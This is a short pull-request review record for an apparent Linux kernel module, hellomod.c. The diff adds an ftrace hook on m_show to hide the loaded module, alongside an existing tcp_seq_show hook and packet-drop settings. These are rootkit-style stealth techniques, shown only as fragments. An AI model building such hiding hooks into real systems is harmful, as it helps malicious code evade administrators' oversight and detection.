### PR TITLE
added hide loaded module feature

### PR DESCRIPTION
**Pull request by kobybs**

### CODE REVIEW

File: hellomod.c [hunk 1]
```diff
@@ -35,10 +35,12 @@
 #define DROP_SIP "\x08\x08\x08\x08"
 #define DROP_ARP_SIP "\x0a\x00\x00\xfa"
 #define DROP_SPORT 5999
+#define HIDDEN_MOD_NAME "mymod"
```
Comment (azisso) [inline hellomod.c]: can you get it dynamically?

File: hellomod.c [hunk 2]
```diff
@@ -88,6 +95,15 @@ int init_module(void)
         undo_sys_hooks(sys_hooks, ARRAY_SIZE(sys_hooks));
         return FAILED_TO_SET_FHOOK_HOOK;
     }
+
+    res = set_ftrace_hook("m_show", &m_show_fhook);
+    if (res != 0){
+        printk("failed to set m_show hook");
+        undo_ftrace_hook(&tcp_seq_show_fhook);
```
Comment (azisso) [inline hellomod.c]: Can you use a cleanup section to avoid this code duplication?

File: hellomod.c (hunk 1 above)
Comment (kobybs) [reply hellomod.c]: Thanks, I am now using THIS_MODULE->name inside the m_show hook. DONE.

File: hellomod.c (hunk 2 above)
Comment (kobybs) [reply hellomod.c]: added a cleanup section based on the result of error code. DONE.

**Pull request closed without merging**